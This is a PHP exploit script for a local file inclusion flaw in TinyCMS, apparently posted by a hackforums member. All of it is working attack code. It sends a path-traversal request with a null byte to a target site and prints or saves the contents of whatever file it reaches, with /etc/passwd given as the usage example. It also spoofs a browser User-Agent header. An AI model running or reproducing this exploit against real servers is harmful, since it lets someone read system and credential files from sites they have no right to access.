<?php

# TinyCMS - Local File Inclusion
# http://hackforums.net/member.php?action=profile&uid=42381

echo <<<EOT

    __________________________________
    \ TinyCMS - Local File Inclusion /
    /         Author: Phizo          \
    __________________________________


EOT;


$options = getopt('u:f:o:n::');

if(!isset($options['u'], $options['f']))
    die("\n       Usage example: php tinycms.php -u http://target.com/ -f /etc/passwd\n
       -u http://target.com/    The full path to TinyCMS.
       -f /etc/passwd           The file to include.
       -o source.txt            The output file to write to.       [Optional]
       -n                       Omit null byte from request.       [Optional]\n");


$url    =  $options['u'];
$file   =  $options['f'];

$output = @$options['o'];
$null   = @$options['n'];


$url     = !isset($null) ? "{$url}?page=../{$file}%00" : "{$url}?page=../{$file}";
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 
                 'X-Requested-With: XMLHttpRequest');


echo "\n[+] URL       -> {$options['u']}\n";
echo !isset($null) ? "[+] File      -> {$file}\n" : "[+] File      -> {$file}.html\n";
echo !isset($null) ? "[+] Null byte -> included\n" : "[+] Null byte -> omitted\n";
echo "\n[+] Submitting request...\n";


$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$json = curl_exec($handle);
curl_close($handle);

$source = json_decode($json, true);

echo "______________________________________________\n";

if(!empty($source['content']))
{
    if(!isset($output))
        echo "{$source['content']}\n";
    else
        file_put_contents($output, $source['content']);
}
else
{
    die("\n[+] File could not be included.\n");
}

echo "\n[+] Exploit completed.\n";

?> 		 	   		
